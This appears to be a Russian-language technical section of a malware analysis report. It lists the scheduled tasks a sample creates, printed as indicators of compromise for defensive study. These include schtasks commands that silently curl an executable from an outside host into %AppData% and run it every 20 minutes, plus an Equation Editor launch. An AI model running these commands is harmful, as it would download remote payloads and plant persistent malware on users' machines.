Техническая информация
- <SYSTEM32>\tasks\windows\dwm\dwmcorelib
- <SYSTEM32>\tasks\windows\dwm\dwmcore
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 20 /TN \Windows\DWM\DWMCORELIB /TR "%AppData%\dwmcor.exe" /f
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 15 /TN \Windows\DWM\DWMCORE /TR "cmd /c start /min curl --output %AppData%\dwmcor.exe -O ""https://qwavemediaservice.net/hkcu/qt.php/?dt=%computername%-QT-2&ct=QT""" /f
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 20 /TN \Windows\DWM\DWMCORELIB /TR "%AppData%\dwmcor.exe" /f' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 15 /TN \Windows\DWM\DWMCORE /TR "cmd /c start /min curl --output %AppData%\dwmcor.exe -O ""https://qwavemediaservice.net/hkcu/qt.php/?dt=%computername%-QT-2&ct=QT""" /f' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding